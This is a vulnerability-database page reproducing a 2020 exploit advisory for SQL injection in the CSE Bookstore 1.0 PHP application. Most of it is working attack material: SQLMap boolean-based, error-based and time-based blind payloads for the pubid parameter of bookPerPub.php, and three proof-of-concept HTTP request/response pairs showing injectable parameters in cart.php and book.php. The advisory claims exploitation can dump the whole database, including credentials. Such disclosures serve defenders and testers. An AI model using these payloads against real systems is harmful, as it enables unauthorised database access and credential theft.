Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CSE Bookstore 1.0 SQL Injection

🗓️ 22 Dec 2020 00:00:00Reported by Musyoka IanType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 269 Views

CSE Bookstore 1.0 SQL Injection vulnerability in multiple file

Code
`# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection  
# Date : 2020-12-21  
# Author : Musyoka Ian  
# Version : CSE Bookstore 1.0  
# Vendor Homepage: https://projectworlds.in/  
# Platform : PHP  
# Tested on : Debian  
  
CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on  
  
Below is results returned by SQLMap   
  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)  
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT  
  
  
POC 1   
  
REQUEST  
========  
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1  
Host: 192.168.196.83  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n  
Upgrade-Insecure-Requests: 1  
  
RESPONSE  
========  
  
HTTP/1.1 200 OK  
Date: Mon, 21 Dec 2020 20:09:49 GMT  
Server: Apache/2.4.38 (Debian)  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 172  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1  
  
POC 2  
Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter  
  
REQUEST  
=======  
  
POST /ebook/cart.php HTTP/1.1  
Host: 192.168.196.83  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 57  
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9  
  
  
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart  
  
RESPONSE  
=======  
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1  
  
POC 3.  
Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials  
  
REQUEST  
=======  
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1  
Host: 192.168.196.83  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Referer: http://192.168.196.83/ebook/books.php  
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on  
  
RESPONSE  
========  
HTTP/1.1 200 OK  
Date: Mon, 21 Dec 2020 20:47:58 GMT  
Server: Apache/2.4.38 (Debian)  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 188  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Dec 2020 00:00Current
cse bookstore 1.0sql injectiondebianphpexploitblindboolean-basederror-basedweb applicationdatabasevulnerablesecurity issue
269